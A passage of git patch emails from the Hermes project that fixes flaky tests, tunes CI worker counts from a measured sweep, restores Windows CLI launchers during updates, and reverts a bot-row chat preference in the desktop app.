b/tests/hermes_cli/test_config_read_guard.py @@ -24,6 +24,7 @@ file to the allowlist without a reason of the same class. from __future__ import annotations +import os import re from pathlib import Path @@ -49,6 +50,9 @@ ALLOWLIST = { EXCLUDED_DIR_PARTS = { "tests", ".venv", ".git", ".worktrees", "node_modules", "website", "docs", "scripts", "examples", "apps", + # Compiled bytecode is not source. Sibling test processes also create + # and delete these directories while this scan walks the tree. + "__pycache__", } # A safe_load within this many lines of a config.yaml reference is treated @@ -60,11 +64,27 @@ CONFIG_YAML_RE = re.compile(r"""["']config\.yaml["']""") def _iter_source_files(): - for path in REPO_ROOT.rglob("*.py"): - rel = path.relative_to(REPO_ROOT) - if any(part in EXCLUDED_DIR_PARTS for part in rel.parts): - continue - yield rel, path + # This uses os.walk with a pruned dirnames, and not rglob. rglob descends + # into every directory and filters after that, so it calls scandir() on + # __pycache__ trees that this guard never inspects. Sibling test processes + # create and delete those entries during the run. + # + # A directory that disappears in the middle of a walk raises + # FileNotFoundError out of rglob. The test then fails for a reason that it + # does not assert. + # + # The prune skips those trees. The onerror callback ignores a directory + # that disappears anyway. + for dirpath, dirnames, filenames in os.walk(REPO_ROOT, onerror=lambda _e: None): + dirnames[:] = [d for d in dirnames if d not in EXCLUDED_DIR_PARTS] + for name in filenames: + if not name.endswith(".py"): + continue + path = Path(dirpath) / name + rel = path.relative_to(REPO_ROOT) + if any(part in EXCLUDED_DIR_PARTS for part in rel.parts): + continue + yield rel, path def test_no_raw_config_yaml_reads_outside_owner_modules(): diff --git a/tests/tools/test_process_registry_write_stdin_surrogates.py b/tests/tools/test_process_registry_write_stdin_surrogates.py index 811323d70c..539d980caf 100644 --- a/tests/tools/test_process_registry_write_stdin_surrogates.py +++ b/tests/tools/test_process_registry_write_stdin_surrogates.py @@ -30,9 +30,25 @@ def test_write_stdin_pty_surrogateescape_roundtrip(tmp_path): session.id, b"\xff".decode("utf-8", "surrogateescape") + "\n" ) assert result["status"] == "ok", result - deadline = time.monotonic() + 10 - while time.monotonic() < deadline and not out.exists(): + # Wait for the CONTENT, and not for the file to exist. The child runs + # open(out,'wb').write(...). open() creates the file empty, and the + # bytes arrive only after the PTY delivers the line. The previous wait + # stopped at out.exists(), which the empty file already satisfies, so + # the read returned b'' when the parent won that gap. + # + # On a 144-worker runner the gap is wide enough to lose every time. + # This test failed both attempts in CI, and not one time only. It also + # loses 6 times in 25 runs on an idle 16-core machine. + deadline = time.monotonic() + 30 + got = b"" + while time.monotonic() < deadline: + try: + got = out.read_bytes() + except FileNotFoundError: + got = b"" + if got == b"\xff\n": + break time.sleep(0.05) - assert out.read_bytes() == b"\xff\n" + assert got == b"\xff\n" finally: registry.kill_process(session.id) From 0012dd1e0c7efc7e86fa75b89567a492057f0c02 Mon Sep 17 00:00:00 2001 From: ethernet Date: Sat, 22 Aug 2026 01:14:19 -0400 Subject: [PATCH 116/161] perf(ci): set python test workers to one for each core, from measurement `run_tests.sh` defaults to twice the core count, and the value this branch started with came from a rule of thumb of 1.5x cores plus a measurement on a 16-core machine. A sweep on the real runner disagrees with both. Run 32549672063 on the 96-core runner (EPYC 7763, 377GB) timed the whole suite at six worker counts, two repetitions for each. A warmup run came first, and retries were off: workers x cores rep 1 rep 2 mean 48 0.5x 138s 139s 138s 96 1.0x 127s 126s 126s <- fastest 144 1.5x 130s 134s 132s 192 2.0x 132s 133s 132s 240 2.5x 140s 139s 140s 288 3.0x 143s 142s 142s One worker for each core wins. Both repetitions agree on the order. The shape is the more useful result. The range is 126s to 142s across a 6x range of worker counts. The suite has sufficient concurrency at this machine size, so nothing above the core count buys anything. The remaining time belongs to the slowest individual files and to the setup. A future gain must come from those, and not from this number. The sweep ran from a temporary workflow that this branch does not keep. --- .github/workflows/tests.yml | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index 7286abf6a8..a0dca54ad0 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -104,8 +104,22 @@ jobs: # from a single ThreadPoolExecutor, so this value IS the limit. The # default is cpu_count*2, which is 192 here. # - # A later commit sets this from a sweep on the real runner. - HERMES_TEST_WORKERS: 144 + # Measured on this runner (96-core EPYC 7763, 377GB). Whole suite, + # two repetitions for each value. See run 32549672063: + # + # workers x cores mean + # 48 0.5x 138s + # 96 1.0x 126s <- fastest + # 144 1.5x 132s + # 192 2.0x 132s + # 240 2.5x 140s + # 288 3.0x 142s + # + # One worker for each core wins. The curve is shallow: 126s to 142s + # across a 6x range. The suite has sufficient concurrency at this + # size. The remaining time is the slowest files plus the setup. + # Workers above the core count only add contention. + HERMES_TEST_WORKERS: 96 # Ensure tests don't accidentally call real APIs OPENROUTER_API_KEY: "" OPENAI_API_KEY: "" From 9098f6777b93b7881216a9b7d8fb402899f62400 Mon Sep 17 00:00:00 2001 From: "hermes-seaeye[bot]" <307254004+hermes-seaeye[bot]@users.noreply.github.com> Date: Sat, 22 Aug 2026 06:29:29 +0000 Subject: [PATCH 117/161] fmt(js): `npm run fix` on merge (#92094) Co-authored-by: github-actions[bot] --- .../src/components/ui/confirm-dialog-unmount.test.tsx | 10 +--------- apps/desktop/src/components/ui/zoomable.tsx | 2 ++ 2 files changed, 3 insertions(+), 9 deletions(-) diff --git a/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx b/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx index e797b35abe..c2d1d58716 100644 --- a/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx +++ b/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx @@ -34,15 +34,7 @@ test('the close timer does not fire after unmount', async () => { const onClose = vi.fn() const onConfirm = vi.fn() - render( - - ) + render() fireEvent.click(screen.getByRole('button', { name: 'Delete' })) diff --git a/apps/desktop/src/components/ui/zoomable.tsx b/apps/desktop/src/components/ui/zoomable.tsx index 46aed953c0..8fa4c9e767 100644 --- a/apps/desktop/src/components/ui/zoomable.tsx +++ b/apps/desktop/src/components/ui/zoomable.tsx @@ -141,9 +141,11 @@ function Toolbar({ await onCopy() setCopied(true) + if (resetRef.current !== null) { window.clearTimeout(resetRef.current) } + resetRef.current = window.setTimeout(() => { resetRef.current = null setCopied(false) From 9782275b2a79368d6247c0ee9cd5418523a5df3f Mon Sep 17 00:00:00 2001 From: Gille <4317663+helix4u@users.noreply.github.com> Date: Sat, 22 Aug 2026 00:18:42 -0600 Subject: [PATCH 118/161] fix(windows): restore dedicated CLI launchers on update --- hermes_cli/_install_repair.py | 50 ++++++++ hermes_cli/update_cmd.py | 29 +++-- scripts/ci/test_install_ps1_cli_launchers.ps1 | 115 ++++++++++++++++++ scripts/install.ps1 | 48 +++++--- .../test_windows_cli_launcher_repair.py | 81 ++++++++++++ 5 files changed, 297 insertions(+), 26 deletions(-) create mode 100644 scripts/ci/test_install_ps1_cli_launchers.ps1 create mode 100644 tests/hermes_cli/test_windows_cli_launcher_repair.py diff --git a/hermes_cli/_install_repair.py b/hermes_cli/_install_repair.py index 76e78adb98..e586c7cc1e 100644 --- a/hermes_cli/_install_repair.py +++ b/hermes_cli/_install_repair.py @@ -24,6 +24,7 @@ from __future__ import annotations import contextlib import json import os +import shutil import subprocess import sys import time @@ -117,6 +118,55 @@ def _venv_scripts_dir(root: Path) -> Path | None: return scripts if scripts.is_dir() else None +def _sync_windows_cli_launchers(root: Path) -> list[Path]: + """Copy the venv's Hermes launchers into the dedicated PATH directory. + + Windows installs expose ``\\bin`` on PATH instead of the full + ``venv\\Scripts`` directory, which would shadow the user's Python. Keep + that narrow PATH layout usable after an update by restoring launchers that + are missing from the dedicated directory. + + ``hermes.exe`` is required; ``hermes-acp.exe`` is copied when available. + Existing files are left alone because ``bin\\hermes.exe`` may be the + executable currently running this process. + """ + if not _is_windows(): + return [] + + root = Path(root) + scripts_dir = _venv_scripts_dir(root) + required_source = ( + scripts_dir / "hermes.exe" + if scripts_dir is not None + else root / "venv" / "Scripts" / "hermes.exe" + ) + if scripts_dir is None or not required_source.is_file(): + raise FileNotFoundError( + f"required Hermes launcher not found: {required_source}" + ) + + bin_dir = root / "bin" + bin_dir.mkdir(parents=True, exist_ok=True) + + copied: list[Path] = [] + for name in ("hermes.exe", "hermes-acp.exe"): + source = scripts_dir / name + if not source.is_file(): + continue + destination = bin_dir / name + if destination.exists(): + continue + shutil.copy2(source, destination) + copied.append(destination) + + required_destination = bin_dir / "hermes.exe" + if not required_destination.is_file(): + raise FileNotFoundError( + f"Hermes launcher was not installed: {required_destination}" + ) + return copied + + def _load_console_script_names(root: Path) -> list[str]: """``[project.scripts]`` names from pyproject.toml (tomllib, 3.11+).""" try: diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index c380f24e9a..8bdecc9446 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -3410,7 +3410,12 @@ def _ensure_fhs_path_guard() -> None: print(" (reload your shell or run 'source ~/.bashrc' to pick it up)") def _ensure_acp_launcher() -> None: - """Self-heal: install a ``hermes-acp`` launcher next to the ``hermes`` one. + """Self-heal the platform launchers exposed on PATH. + + On Windows, restore missing ``hermes.exe`` / ``hermes-acp.exe`` copies in + the dedicated ``\\bin`` directory. Existing files are not + overwritten because ``bin\\hermes.exe`` may be the currently running + update launcher. Mirrors the launcher block in ``scripts/install.sh`` so existing installs gain the ACP command on ``hermes update`` without a reinstall. ACP hosts @@ -3424,14 +3429,21 @@ def _ensure_acp_launcher() -> None: (venv wrapper, FHS symlink, pipx/pip console script) without having to reconstruct interpreter/entrypoint paths. - No-op on Windows (install.ps1 copies ``hermes.exe`` + ``hermes-acp.exe`` - into ``$InstallDir\bin`` and puts THAT on the user PATH — never the whole - ``venv\Scripts`` dir, which would shadow the user's ``python`` (#83797) — - so ``hermes-acp.exe`` already resolves) and wherever a ``hermes-acp`` is - already present next to the ``hermes`` command. Unwritable directories + On POSIX, the ACP shim is skipped wherever a ``hermes-acp`` is already + present next to the ``hermes`` command. Unwritable POSIX directories (e.g. ``/usr/local/bin`` as non-root) are skipped silently. Idempotent. """ if _m().sys.platform == "win32": + from hermes_cli._install_repair import _sync_windows_cli_launchers + + try: + copied = _sync_windows_cli_launchers(Path(_m().PROJECT_ROOT)) + except OSError as exc: + print(f" ⚠ Could not restore Windows command launchers: {exc}") + return + if copied: + names = ", ".join(path.name for path in copied) + print(f" ✓ Restored Windows command launcher(s): {names}") return for bin_dir in (Path.home() / ".local" / "bin", Path("/usr/local/bin")): hermes_cmd = bin_dir / "hermes" @@ -7030,9 +7042,8 @@ def _cmd_update_impl(args, gateway_mode: bool): except Exception as e: logger.debug("FHS PATH guard check failed: %s", e) - # Self-heal the hermes-acp launcher for installs that predate it, so - # ACP hosts (Zed, JetBrains, Buzz) can resolve Hermes on PATH without - # a reinstall. No-op on Windows and when already present. + # Self-heal the launchers exposed on PATH: the POSIX hermes-acp shim + # and missing copies in Windows' dedicated bin directory. try: _ensure_acp_launcher() except Exception as e: diff --git a/scripts/ci/test_install_ps1_cli_launchers.ps1 b/scripts/ci/test_install_ps1_cli_launchers.ps1 new file mode 100644 index 0000000000..8a44938534 --- /dev/null +++ b/scripts/ci/test_install_ps1_cli_launchers.ps1 @@ -0,0 +1,115 @@ +# Behavioral test for install.ps1's dedicated Hermes launcher directory. +# +# Run: powershell.exe -NoProfile -File scripts/ci/test_install_ps1_cli_launchers.ps1 +# +# The test lifts the real Install-HermesCommandLaunchers function from the +# PowerShell AST and executes it against a temporary install tree. It never +# reads or changes the user's PATH. + +Set-StrictMode -Version Latest +$ErrorActionPreference = 'Stop' + +$installPs1 = Join-Path (Join-Path $PSScriptRoot '..') 'install.ps1' | Resolve-Path +$ast = [System.Management.Automation.Language.Parser]::ParseFile( + $installPs1, [ref]$null, [ref]$null) + +$fn = $ast.Find({ + param($n) + $n -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $n.Name -eq 'Install-HermesCommandLaunchers' +}, $true) + +if (-not $fn) { + throw "Install-HermesCommandLaunchers not found in $installPs1" +} + +Invoke-Expression $fn.Extent.Text + +$tempBase = [System.IO.Path]::GetFullPath([System.IO.Path]::GetTempPath()) +$caseRoot = [System.IO.Path]::GetFullPath((Join-Path $tempBase ( + 'hermes-cli-launcher-test-' + [guid]::NewGuid().ToString('N') +))) +if (-not $caseRoot.StartsWith($tempBase, [System.StringComparison]::OrdinalIgnoreCase)) { + throw "Refusing to create test directory outside the system temp directory: $caseRoot" +} + +$script:Failures = 0 + +function Assert-True { + param([bool]$Condition, [string]$Name) + if ($Condition) { + Write-Host " PASS $Name" + } else { + Write-Host " FAIL $Name" + $script:Failures++ + } +} + +function Assert-BytesEqual { + param([byte[]]$Expected, [byte[]]$Actual, [string]$Name) + $same = $Expected.Length -eq $Actual.Length + if ($same) { + for ($i = 0; $i -lt $Expected.Length; $i++) { + if ($Expected[$i] -ne $Actual[$i]) { + $same = $false + break + } + } + } + Assert-True $same $Name +} + +try { + New-Item -ItemType Directory -Force -Path $caseRoot | Out-Null + + $missingThrew = $false + try { + Install-HermesCommandLaunchers -Root $caseRoot | Out-Null + } catch { + $missingThrew = $_.Exception.Message -like '*required launcher not found*' + } + Assert-True $missingThrew 'missing hermes.exe fails the launcher stage' + Assert-True (-not (Test-Path -LiteralPath (Join-Path $caseRoot 'bin'))) ` + 'failure does not create an empty PATH directory' + + $scriptsDir = Join-Path $caseRoot 'venv\Scripts' + New-Item -ItemType Directory -Force -Path $scriptsDir | Out-Null + $hermesV1 = [byte[]](77, 90, 1) + $hermesV2 = [byte[]](77, 90, 2) + $acp = [byte[]](77, 90, 3) + [System.IO.File]::WriteAllBytes((Join-Path $scriptsDir 'hermes.exe'), $hermesV1) + + $binDir = Install-HermesCommandLaunchers -Root $caseRoot + Assert-BytesEqual $hermesV1 ` + ([System.IO.File]::ReadAllBytes((Join-Path $binDir 'hermes.exe'))) ` + 'required launcher is copied into the dedicated bin directory' + Assert-True (-not (Test-Path -LiteralPath (Join-Path $binDir 'hermes-acp.exe'))) ` + 'optional ACP launcher may be absent' + + [System.IO.File]::WriteAllBytes((Join-Path $scriptsDir 'hermes.exe'), $hermesV2) + [System.IO.File]::WriteAllBytes((Join-Path $scriptsDir 'hermes-acp.exe'), $acp) + Install-HermesCommandLaunchers -Root $caseRoot | Out-Null + Assert-BytesEqual $hermesV2 ` + ([System.IO.File]::ReadAllBytes((Join-Path $binDir 'hermes.exe'))) ` + 'installer refreshes an existing Hermes launcher' + Assert-BytesEqual $acp ` + ([System.IO.File]::ReadAllBytes((Join-Path $binDir 'hermes-acp.exe'))) ` + 'installer copies the optional ACP launcher when present' +} finally { + if (Test-Path -LiteralPath $caseRoot) { + $resolvedCase = [System.IO.Path]::GetFullPath($caseRoot) + if (-not $resolvedCase.StartsWith($tempBase, [System.StringComparison]::OrdinalIgnoreCase)) { + throw "Refusing to remove test directory outside the system temp directory: $resolvedCase" + } + Remove-Item -LiteralPath $resolvedCase -Recurse -Force + } +} + +if ($script:Failures -gt 0) { + Write-Host "" + Write-Host "$script:Failures assertion(s) failed" + exit 1 +} + +Write-Host "" +Write-Host "all assertions passed" diff --git a/scripts/install.ps1 b/scripts/install.ps1 index 38c2012a97..d045707e4a 100644 --- a/scripts/install.ps1 +++ b/scripts/install.ps1 @@ -2977,29 +2977,43 @@ print(','.join(scripts)) Write-Success "All dependencies installed" } +function Install-HermesCommandLaunchers { + param( + [Parameter(Mandatory=$true)] [string]$Root + ) + + # Expose ONLY the Hermes launchers on PATH -- never the whole + # venv\Scripts directory. Requiring hermes.exe before creating bin keeps + # the PATH stage from reporting success with an unusable command. + $scriptsDir = Join-Path $Root "venv\Scripts" + $requiredSource = Join-Path $scriptsDir "hermes.exe" + if (-not (Test-Path -LiteralPath $requiredSource -PathType Leaf)) { + throw "Cannot set up the hermes command: required launcher not found: $requiredSource" + } + + $hermesBin = Join-Path $Root "bin" + New-Item -ItemType Directory -Force -Path $hermesBin | Out-Null + foreach ($launcher in @("hermes.exe", "hermes-acp.exe")) { + $src = Join-Path $scriptsDir $launcher + if (Test-Path -LiteralPath $src -PathType Leaf) { + Copy-Item -Force -LiteralPath $src -Destination (Join-Path $hermesBin $launcher) + } + } + + $requiredDestination = Join-Path $hermesBin "hermes.exe" + if (-not (Test-Path -LiteralPath $requiredDestination -PathType Leaf)) { + throw "Cannot set up the hermes command: launcher was not installed: $requiredDestination" + } + return $hermesBin +} + function Set-PathVariable { Write-Info "Setting up hermes command..." if ($NoVenv) { $hermesBin = "$InstallDir" } else { - # Expose ONLY the hermes launchers on PATH -- never the whole - # venv\Scripts directory. venv\Scripts contains python.exe / - # pythonw.exe / pip.exe, and putting it on the user PATH silently - # hijacks the `python` command in every terminal on the machine - # (#83797): unrelated projects start resolving python to Hermes' - # runtime interpreter. A dedicated bin dir with copies of the - # launcher exes keeps `hermes` globally available without - # shadowing anything. (Launcher exes embed the venv interpreter - # path, so they work from any location and survive updates.) - $hermesBin = "$InstallDir\bin" - New-Item -ItemType Directory -Force -Path $hermesBin | Out-Null - foreach ($launcher in @("hermes.exe", "hermes-acp.exe")) { - $src = "$InstallDir\venv\Scripts\$launcher" - if (Test-Path $src) { - Copy-Item -Force $src "$hermesBin\$launcher" - } - } + $hermesBin = Install-HermesCommandLaunchers -Root $InstallDir } $currentPath = [Environment]::GetEnvironmentVariable("Path", "User") diff --git a/tests/hermes_cli/test_windows_cli_launcher_repair.py b/tests/hermes_cli/test_windows_cli_launcher_repair.py new file mode 100644 index 0000000000..12f380dfb9 --- /dev/null +++ b/tests/hermes_cli/test_windows_cli_launcher_repair.py @@ -0,0 +1,81 @@ +"""Regression coverage for Windows' dedicated Hermes launcher directory.""" + +from __future__ import annotations + +from types import SimpleNamespace + +import pytest + +from hermes_cli import _install_repair as install_repair +from hermes_cli import update_cmd + + +def _make_windows_launchers(tmp_path): + root = tmp_path / "hermes-agent" + scripts = root / "venv" / "Scripts" + scripts.mkdir(parents=True) + (scripts / "hermes.exe").write_bytes(b"MZ-hermes") + (scripts / "hermes-acp.exe").write_bytes(b"MZ-hermes-acp") + return root + + +def _force_windows(monkeypatch, root): + fake_main = SimpleNamespace( + sys=SimpleNamespace(platform="win32"), + PROJECT_ROOT=root, + ) + monkeypatch.setattr(update_cmd, "_m", lambda: fake_main) + monkeypatch.setattr(install_repair, "_is_windows", lambda: True) + + +def test_update_restores_missing_dedicated_launchers(tmp_path, monkeypatch): + root = _make_windows_launchers(tmp_path) + _force_windows(monkeypatch, root) + + update_cmd._ensure_acp_launcher() + + assert (root / "bin" / "hermes.exe").read_bytes() == b"MZ-hermes" + assert (root / "bin" / "hermes-acp.exe").read_bytes() == b"MZ-hermes-acp" + + +def test_update_does_not_overwrite_running_launcher(tmp_path, monkeypatch): + root = _make_windows_launchers(tmp_path) + bin_dir = root / "bin" + bin_dir.mkdir() + (bin_dir / "hermes.exe").write_bytes(b"MZ-running") + _force_windows(monkeypatch, root) + + update_cmd._ensure_acp_launcher() + + assert (bin_dir / "hermes.exe").read_bytes() == b"MZ-running" + assert (bin_dir / "hermes-acp.exe").read_bytes() == b"MZ-hermes-acp" + + +def test_missing_required_source_is_visible_and_does_not_create_bin( + tmp_path, monkeypatch, capsys +): + root = tmp_path / "hermes-agent" + (root / "venv" / "Scripts").mkdir(parents=True) + _force_windows(monkeypatch, root) + + update_cmd._ensure_acp_launcher() + + assert "Could not restore Windows command launchers" in capsys.readouterr().out + assert not (root / "bin").exists() + + +def test_sync_helper_is_noop_off_windows(tmp_path, monkeypatch): + monkeypatch.setattr(install_repair, "_is_windows", lambda: False) + + assert install_repair._sync_windows_cli_launchers(tmp_path) == [] + + +def test_sync_helper_requires_hermes_source(tmp_path, monkeypatch): + root = tmp_path / "hermes-agent" + (root / "venv" / "Scripts").mkdir(parents=True) + _force_windows(monkeypatch, root) + + with pytest.raises(FileNotFoundError, match="required Hermes launcher"): + install_repair._sync_windows_cli_launchers(root) + + assert not (root / "bin").exists() From a08b909199a5c4cdc83f6b2077f52d349ff4ba2c Mon Sep 17 00:00:00 2001 From: Gille <4317663+helix4u@users.noreply.github.com> Date: Sat, 22 Aug 2026 00:29:03 -0600 Subject: [PATCH 119/161] fix(windows): preserve launcher layout invariants --- hermes_cli/_install_repair.py | 12 ++++++------ scripts/install.ps1 | 3 ++- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/hermes_cli/_install_repair.py b/hermes_cli/_install_repair.py index e586c7cc1e..848d400b0b 100644 --- a/hermes_cli/_install_repair.py +++ b/hermes_cli/_install_repair.py @@ -135,12 +135,12 @@ def _sync_windows_cli_launchers(root: Path) -> list[Path]: root = Path(root) scripts_dir = _venv_scripts_dir(root) - required_source = ( - scripts_dir / "hermes.exe" - if scripts_dir is not None - else root / "venv" / "Scripts" / "hermes.exe" - ) - if scripts_dir is None or not required_source.is_file(): + if scripts_dir is None: + raise FileNotFoundError( + f"project venv executable directory not found under: {root}" + ) + required_source = scripts_dir / "hermes.exe" + if not required_source.is_file(): raise FileNotFoundError( f"required Hermes launcher not found: {required_source}" ) diff --git a/scripts/install.ps1 b/scripts/install.ps1 index d045707e4a..67f08bcb66 100644 --- a/scripts/install.ps1 +++ b/scripts/install.ps1 @@ -3013,7 +3013,8 @@ function Set-PathVariable { if ($NoVenv) { $hermesBin = "$InstallDir" } else { - $hermesBin = Install-HermesCommandLaunchers -Root $InstallDir + $hermesBin = "$InstallDir\bin" + Install-HermesCommandLaunchers -Root $InstallDir | Out-Null } $currentPath = [Environment]::GetEnvironmentVariable("Path", "User") From ff88f27403e1131f7a1c4f859e51d5d28851bd8c Mon Sep 17 00:00:00 2001 From: abitme <59790916+abitme@users.noreply.github.com> Date: Sat, 22 Aug 2026 14:31:14 +0700 Subject: [PATCH 120/161] fix(bot-mode): a bot row opens the bot's canonical Bot Chat (#92042) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Partially reverts the newer-visible-session preference from #91791 (salvage of #91258), which made the pinned canonical Bot Chat unreachable. Fixes #92040. Canonical Bot Chats are ALWAYS hidden from the Sessions sidebar: session.create passes hidden:true unconditionally and hideOwnedBotSessions() sweeps any that were born visible (asserted in tests/hide-bot-chats.test.mjs). The bot row is therefore the ONLY entry point to a bot's forever-chat, so preferring the profile's freshest visible session did not re-order two equivalent doors — it removed the only one. Reported symptom: a 106-message bot-building conversation with no reachable entry point anywhere in the UI, while the row previewed one session and opened another (a regression of the preview/click identity #88200 established). The report behind #91791 was real but has a non-destructive answer: scratch sessions started via "New chat with this agent" are not plumbing-titled, so neither hideOwnedBotSessions() nor sweepBotProfileSessions() hides them (the sweep matches the exact titles 'Bot Chat' / 'Agent Inbox' / 'Group: …'). They stay listed in the Sessions sidebar and are reachable there; they simply are not what the bot row targets, which is by design. Changes: - openBotCanonicalChat: when the pin is alive and verified, open it directly. The newerVisibleBotChat preference is removed from that branch only; the helper stays for the dead-pin recovery path. - Drop the now-unused latestVisible parameter and its argument at the BotRow call site. The second call site already passed three args. - tests/bot-row-opens-latest.test.mjs -> tests/bot-row-opens-canonical-chat.test.mjs: the two tests that asserted the newer-session behaviour are rewritten rather than deleted, so the reasoning survives in the suite. Adds a source-level guard ("the healthy-pin branch never prefers a newer visible session") so this cannot silently regress. The deleted-newer-session fallback test covered a path that no longer exists; replaced with one asserting a failed open of a verified pin propagates instead of forking the forever-chat. The keepAllProfilesScope: false half of #91791 is untouched. Plugin suite: 392 pass, 0 fail. --- .../desktop/src/plugins/hermes-bots/plugin.js | 81 +++++++------ ... => bot-row-opens-canonical-chat.test.mjs} | 107 +++++++++++------- 2 files changed, 108 insertions(+), 80 deletions(-) rename apps/desktop/src/plugins/hermes-bots/tests/{bot-row-opens-latest.test.mjs => bot-row-opens-canonical-chat.test.mjs} (63%) diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index d55604b6a6..2b6bc62eb8 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -4272,9 +4272,17 @@ function isCanonicalBotChatHistory(history) { /** The bot's newest VISIBLE conversation when it should win over the pin, else * null. * - * A bot row is a workspace entry point, so it must land on what the user was - * last saying to that bot — not on a pin frozen weeks ago. Guards, all of - * which matter: + * RETAINED FOR THE DEAD-PIN RECOVERY PATH ONLY. This is deliberately NOT + * consulted while the pin is alive: Bot Mode's documented contract is "click + * a Bot to land in its chat — every Bot has a canonical, persistent Bot Chat + * conversation that is created (and pinned) the moment the Bot is born", and + * canonical Bot Chats are ALWAYS hidden from the Sessions sidebar + * (session.create passes hidden:true unconditionally — see + * hide-bot-chats.test.mjs). The bot row is therefore the ONLY door to the + * forever-chat; preferring a newer session here walls the relationship off + * behind a door that no longer leads to it. + * + * Guards, all of which matter: * - the canonical Bot Chat itself is never "newer" (it IS the pin), so * plumbing can't shadow itself; * - an empty draft is skipped: clicking a bot right after a stray ⌘N would @@ -4299,7 +4307,7 @@ function newerVisibleBotChat(pinned, history) { return id } -async function openBotCanonicalChat(name, pinned, history, latestVisible) { +async function openBotCanonicalChat(name, pinned, history) { if (!pinned) { // Grandfather only an actual Bot Chat. `last_session` is merely the most // recent row for the profile; adopting it blindly can claim an unrelated @@ -4341,38 +4349,29 @@ async function openBotCanonicalChat(name, pinned, history, latestVisible) { } if (preferred && isCanonicalBotChatHistory(preferred)) { - // The pin is alive and healthy — but it is not necessarily where the user - // left off. Prefer their MOST RECENT real conversation with this bot. + // The pin is alive and healthy — open it. This is the whole contract: + // "Click a Bot to land in its chat — every Bot has a canonical, + // persistent Bot Chat conversation that is created (and pinned) the + // moment the Bot is born." // - // "One bot = one forever chat" welded each row to a single session: start - // a new chat with a bot, click another bot, click back, and the new chat - // was stranded behind the pinned transcript ("세션을 다시 만들어도 다른 봇 - // 갔다가 다시 누르면 그 전 세션으로 돌아와"). A bot row is a workspace - // entry point here, so it should land on the live conversation. The pin - // keeps owning plumbing — creation, hide sweep, DM delivery — and stays - // untouched; it just stops overriding newer work. + // A newer-visible-session preference used to sit here, so that a bot row + // landed on the user's most recent conversation instead of the pin. It + // was reverted (2026-08-22) because it is unsound given how Bot Mode + // stores these chats: canonical Bot Chats are ALWAYS hidden from the + // Sessions sidebar (session.create passes hidden:true unconditionally, + // and hideOwnedBotSessions sweeps any that were born visible). The bot + // row is therefore the ONLY door to the forever-chat, so preferring a + // newer session did not merely re-order two equal entry points — it made + // the pinned relationship unreachable from anywhere in the UI. Reported + // symptom: a bot's whole build history became invisible, while the row + // previewed one session and opened another. // - // Deliberately AFTER the verification above: with a dead or unverified - // pin, adopting the profile's latest row would claim an unrelated user - // conversation as the bot's chat (see the "dead pin" safety tests). - // - // Uses `latestVisible` (the roster's freshest visible session), NOT - // `history` — the caller's `history` prefers the pin so preview identity - // matches click identity, which means it can never BE the newer chat. - // Falls back to `history` for callers that pass only three arguments. - const newer = newerVisibleBotChat(pinned, latestVisible ?? history) - - if (newer) { - try { - await openStoredBotChat(name, newer, history) - - return newer - } catch { - // Deleted or unreachable — fall back to the verified pin below so the - // row is never dead. - } - } - + // The bug that motivated the preference — "I start a new chat with a bot, + // click another bot, click back, and my new chat is gone" — has a + // non-destructive answer: scratch sessions started via "New chat with + // this agent" are NOT plumbing-titled, so the hide sweep leaves them in + // the Sessions sidebar. They are reachable there; they simply are not the + // bot row's target, which is by design. try { await openStoredBotChat(name, preferred.resolved_id || preferred.id, preferred) return pinned @@ -6265,13 +6264,13 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { } try { - // `previewSession` prefers the PIN (preview identity must match click - // identity), so it can never carry the newer conversation. Pass the - // roster's freshest VISIBLE session (`last`) separately — that is what - // "open where I left off" needs. Without this the newer-chat preference - // was dead code: it always received the pin and short-circuited on - // "same id". - const id = await openBotCanonicalChat(bot.name, pinnedChat, previewSession, last) + // `previewSession` prefers the PIN, and so does the click — preview + // identity and click identity are the same session by construction + // (#88200). The roster's freshest visible session is deliberately NOT + // passed: the row's job is to land in the bot's forever-chat, which is + // the only door to it (canonical Bot Chats are always hidden from the + // Sessions sidebar). + const id = await openBotCanonicalChat(bot.name, pinnedChat, previewSession) if (generation === botOpenGeneration && id) { return diff --git a/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs similarity index 63% rename from apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs rename to apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs index 84e03fe5f1..3205326248 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs @@ -6,15 +6,25 @@ import vm from 'node:vm' const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') /** - * A bot row must open the conversation the user was LAST having with that bot. + * A bot row must open the bot's canonical, pinned Bot Chat. * - * Symptom (2026-08-21): every bot was welded to one session. Start a new chat - * with 기획총괄, click 시스템총괄, click back — and the new chat was gone, - * replaced by the pinned transcript. "세션을 다시 만들어도 다른 봇 갔다가 다시 - * 누르면 그 전 세션으로 다시 돌아와." + * This file previously asserted the opposite — that a row opens the user's + * NEWEST visible conversation — after a report that a freshly started chat + * seemed to vanish when clicking away and back. That preference was reverted + * (2026-08-22): canonical Bot Chats are ALWAYS hidden from the Sessions + * sidebar (see hide-bot-chats.test.mjs), so the bot row is the ONLY door to + * the forever-chat. Preferring a newer session made the pinned relationship + * unreachable from anywhere in the UI — a user lost an entire 